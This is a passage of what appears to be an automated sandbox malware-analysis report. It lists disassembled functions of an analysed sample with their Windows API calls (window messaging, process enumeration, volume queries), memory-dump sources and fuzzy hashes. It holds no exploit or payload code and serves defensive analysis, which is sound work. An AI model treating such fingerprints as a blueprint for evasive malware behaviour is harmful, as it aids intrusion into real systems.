                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3d4d40b0f54769599371271f965bbf0f11523a23bc1f6d2158838eac2bd2067f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1b1e7aac640641c2f42a643b7211b0c8ef8c3775264d8fbd2cd662062a380b2c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d4d40b0f54769599371271f965bbf0f11523a23bc1f6d2158838eac2bd2067f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE2190B5A00649AFDB00DF64CCC1EBB37ADEB5A364B000159F9019B3A1CB70EC42CBA0
                                                                                                                                                                                                                                                                                                    Function 00AA4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AA42DC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AA42EC
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AA4312
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                    • String ID: Listbox
                                                                                                                                                                                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                    • Opcode ID: c22cd9ff694c2a6b0c3d784e82371f7d23113819360c14b54860090e962348bd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6a70e2de805fb31ff8a67914db1b777a61d32e98e8d6821d5c6256c355f377fc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c22cd9ff694c2a6b0c3d784e82371f7d23113819360c14b54860090e962348bd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80217C32614218BBEF118F94CC85FEB3B6EEBCA764F118114F9459B1D0CBB19C528BA0
                                                                                                                                                                                                                                                                                                    Function 00A85439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00A8544D
                                                                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A854A1
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00AADCD0), ref: 00A85515
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                    • String ID: %lu
                                                                                                                                                                                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                    • Opcode ID: d4d1b785d4766b8e5751d8df586431d695ad4196359fbd1660a2374739ef1a6e
                                                                                                                                                                                                                                                                                                    • Instruction ID: d450525f1bafa8b8ca8cfaea3323089625e05138e8577b5c08e8d451e7aaaff1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4d1b785d4766b8e5751d8df586431d695ad4196359fbd1660a2374739ef1a6e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5315374A00109AFD710DF64C985EAA7BF9EF05308F1480A5F849DB262DB71EE46CB61
                                                                                                                                                                                                                                                                                                    Function 00AA4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AA4CED
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AA4D02
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AA4D0F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                    • Opcode ID: aa14f87e93e0d93e44aec3311f18a97c59403c272876585a5bb93f2595802ca2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7bdf9502aa52d7a08909198ebd436c6d26d6f0fe510687be7efdee475ea559f9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa14f87e93e0d93e44aec3311f18a97c59403c272876585a5bb93f2595802ca2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD11E371240248BEEF219F69CC06FAB3BA8EF8AB64F110515FA55E70E0C6B1D8519B20
                                                                                                                                                                                                                                                                                                    Function 00A7389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A736F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A73712
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A736F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A73723
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A736F4: GetCurrentThreadId.KERNEL32 ref: 00A7372A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A736F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A73731
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00A738C4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7373B: GetParent.USER32(00000000), ref: 00A73746
                                                                                                                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00A7390F
                                                                                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,00A73987), ref: 00A73937
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: %s%d
                                                                                                                                                                                                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5849e6b885f3e8f24762865e1f43dda0f0a4ea0b3922d40fb9c6980603e0f97a
                                                                                                                                                                                                                                                                                                    • Instruction ID: b6c48afbeffbbab37e57873b714d650ac8b67c25168c709aa862853f76f5694e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5849e6b885f3e8f24762865e1f43dda0f0a4ea0b3922d40fb9c6980603e0f97a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C311D272600206ABCF01BF748E85EEE77AAAF94304F00C075B94D9B292CF7099469B20
                                                                                                                                                                                                                                                                                                    Function 00AA6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AA6360
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00AA638D
                                                                                                                                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 00AA639C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07465a936771a277428c2f0a91c89636672e9cd05a0f8b7b8451146efe5197a5
                                                                                                                                                                                                                                                                                                    • Instruction ID: ed701ccbdda33b5e52619851cc3663b84435b64a3ed2161f54e48a3c3296c678
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07465a936771a277428c2f0a91c89636672e9cd05a0f8b7b8451146efe5197a5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E016D71900219AFDF119F51DC84FAEBBB4FB46355F148099F84ADA190DB308A86EF31
                                                                                                                                                                                                                                                                                                    Function 00A6E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00A6E797
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 00A6E7BD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                    • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9b8254448063c2c4ad9a29584ccf4dd5cd0750d90720b549a0e4bbeccb3a50d0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 496ca40d005503ce49977962c925cf5a2e175cbc03bb2caf78d5c9f486840110
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b8254448063c2c4ad9a29584ccf4dd5cd0750d90720b549a0e4bbeccb3a50d0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7E09B799025319FD772D7649C44FA93234AF11701B150665EC43E6150EB35CD458A55
                                                                                                                                                                                                                                                                                                    Function 00A7096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e48058c280656daff227697510b364b10003d136bfcd2523da8cc2de83a3508
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1b44c692170e0d121c318409025791e18c55e506bd78f37a951a519892a2c03f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e48058c280656daff227697510b364b10003d136bfcd2523da8cc2de83a3508
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAC13A75A00206EFDB15CF98C894EAAB7B5FF88704F15C598E50AEB251D731EE81CB90
                                                                                                                                                                                                                                                                                                    Function 00A441F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6af1447657319e270210b4c67689e4a4b88e14a5cff05e06e13d41d0a13b36d3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BA17A7A9007869FEB21CF28C8917AEBBE4FF99314F2441ADE9959F281C3789D41C750
                                                                                                                                                                                                                                                                                                    Function 00A70D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AB0BD4,?), ref: 00A70EE0
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AB0BD4,?), ref: 00A70EF8
                                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00AADCE0,000000FF,?,00000000,00000800,00000000,?,00AB0BD4,?), ref: 00A70F1D
                                                                                                                                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 00A70F3E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0aa325aebd45a8bf19735d6a4d9b7cf14b714589d0e20e6a8fa762fb109fbc2a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 13684c5cca6435445d1d27b543c6ed288b23ea4c934d43533a1ea8624ec8d964
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0aa325aebd45a8bf19735d6a4d9b7cf14b714589d0e20e6a8fa762fb109fbc2a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0481FA71A00109EFCB14DF94C984EEEB7B9FF89315F208558F516AB250DB71AE46CB60
                                                                                                                                                                                                                                                                                                    Function 00A9B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00A9B10C
                                                                                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00A9B11A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00A9B1FC
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A9B20B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00A54D73,?), ref: 00A2E395
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 350d74ad0fc8e4fafabeeec5b6a6d1b966d4ad2244f023e20b5fcd307d8a7348
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0080e21d230c44d3c9df8282621eff82779c03ca9ee6202514172a14c8bc3604
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 350d74ad0fc8e4fafabeeec5b6a6d1b966d4ad2244f023e20b5fcd307d8a7348
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36516B71608300AFC710EF24D986A9BBBE8FF89754F40492DF58597291EB30D945CBA2
                                                                                                                                                                                                                                                                                                    Function 00A51711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ed6b7b62d216baee75e1bd750ea97b88cdb0f5efe743d1da68ceda31ac8f4847
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2e892d8684f86e2fcaf1a8f76f39dca11addae2f8819791e77b6a179c12b639d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed6b7b62d216baee75e1bd750ea97b88cdb0f5efe743d1da68ceda31ac8f4847
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3413735A00100AFDB307FBD9D82BBE3AA4FF45331F140625FC18D6192EB75480947A1
                                                                                                                                                                                                                                                                                                    Function 00A92533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
